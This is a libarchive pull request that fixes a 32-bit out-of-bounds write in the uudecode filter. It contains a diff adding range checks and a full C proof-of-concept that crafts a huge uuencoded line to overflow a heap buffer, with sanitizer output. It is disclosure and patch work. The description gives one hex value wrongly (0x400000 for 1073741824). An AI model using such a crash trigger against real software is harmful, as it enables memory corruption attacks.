### PR TITLE
uu: Extend range checks to avoid 32 bit OOB

### DIFF
--- a/libarchive/archive_read_support_filter_uu.c
+++ b/libarchive/archive_read_support_filter_uu.c
@@ -43,8 +43,6 @@
 /* Maximum lookahead during bid phase */
 #define UUENCODE_BID_MAX_READ 128*1024 /* in bytes */
 
-#define UUENCODE_MAX_LINE_LENGTH 34*1024 /* in bytes */
-
 struct uudecode {
 	int64_t		 total;
 	unsigned char	*in_buff;
@@ -480,13 +478,15 @@ read_more:
 	used = 0;
 	total = 0;
 	out = uudecode->out_buff;
+	if (avail_in > 2 * UUENCODE_BID_MAX_READ)
+		avail_in = 2 * UUENCODE_BID_MAX_READ;
 	ravail = avail_in;
 	if (uudecode->state == ST_IGNORE) {
 		used = avail_in;
 		goto finish;
 	}
 	if (uudecode->in_cnt) {
-		if (uudecode->in_cnt > UUENCODE_MAX_LINE_LENGTH) {
+		if (uudecode->in_cnt > UUENCODE_BID_MAX_READ) {
 			archive_set_error(&self->archive->archive,
 			    ARCHIVE_ERRNO_FILE_FORMAT,
 			    "Invalid format data");
@@ -521,6 +521,12 @@ read_more:
 			archive_set_error(&self->archive->archive,
 			    ARCHIVE_ERRNO_MISC,
 			    "Insufficient compressed data");
+			return (ARCHIVE_FATAL);
+		}
+		if (len > UUENCODE_BID_MAX_READ) {
+			archive_set_error(&self->archive->archive,
+			    ARCHIVE_ERRNO_FILE_FORMAT,
+			    "Invalid format data");
 			return (ARCHIVE_FATAL);
 		}
 		llen = len;


### PR DESCRIPTION
It is possible to trigger an out of boundary write on 32 bit systems with around 1 GB of data (with a line consuming most of that data) when opened with `archive_read_open_memory`.

Cap the amount of data read at once at `2 * UUENCODE_BID_MAX_READ` to allow range checks to take place before a possible `SSIZE_MAX` overflow can occur through `avail_in`. Also, discard any line longer than `UUENCODE_BID_MAX_READ` since this should definitely be more than enough, especially since `in_cnt` check already takes care of that.

Proof of Concept:
1. Compile proof of concept on 32 bit architecture
```
cat > poc.c << EOF
#include <archive.h>
#include <err.h>
#include <stdlib.h>
#include <string.h>

int
main(void)
{
	char *p, *q;
	size_t s;
	struct archive_entry *ae;
	struct archive *a;
	char buf[1024];
	int i;

	s = 12 + 1038 * 86 + 75 * 6 + 1073741824 + 1;
	p = q = malloc(s);
	if (p == NULL)
		err(1, "malloc");
	strcpy(q, "begin 644 a\n");
	q += sizeof("begin 644 a\n") - 1;
	strcpy(q, "MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\n");
	q += sizeof("MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\n") - 1;
	for (i = 0; i < 1037; i++) {
	    strcpy(q, "_MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\n");
	    q += sizeof("_MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\n") - 1;
	}
	for (i = 0; i < 75; i++) {
	    strcpy(q, "\"MMMM\n");
	    q += sizeof("\"MMMM\n") - 1;
	}
	memset(q, 'M', 1073741824 - 1);
	q += 1073741824 - 1;
	*q++ = '\n';
	*q++ = '\0';

	a = archive_read_new();
	archive_read_support_format_all(a);
	archive_read_support_filter_all(a);
	printf("open mem, %d\n", archive_read_open_memory(a, p, s));
	printf("read next, %d\n", archive_read_next_header(a, &ae));
	printf("read data, %d\n", archive_read_data(a, buf, sizeof(buf)));
	archive_read_free(a);

	return 0;
}
EOF
cc -larchive -o poc poc.c
```
2. Run proof of concept
```
$ ./poc
libarchive/archive_read_support_filter_uu.c:604:20: runtime error: signed integer overflow: 1073741824 * 2 cannot be represented in type 'int'
=================================================================
==18511==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x71e10800 at pc 0xb7191135 bp 0xbfad5ab8 sp 0xbfad5aac
WRITE of size 1 at 0x71e10800 thread T0
    #0 0xb7191134 in uudecode_filter_read libarchive/archive_read_support_filter_uu.c:640
```

The integer overflow happens here:
https://github.com/libarchive/libarchive/blob/8f3fcf9ecd3785a134e654f392005af1aab64010/libarchive/archive_read_support_filter_uu.c#L604

The variable `len` contains the length of the line, and the proof of concept prepares a line with the length of `1073741824` (`0x400000`). Multiplication leads to a negative value, so the test passes. The eventual overflow happens because we write outside of `OUT_BUFF_SIZE` (`65536`). The other lines in front of this huge line are needed to fill the buffer close to this limit, because each line can only add around 45 bytes at once.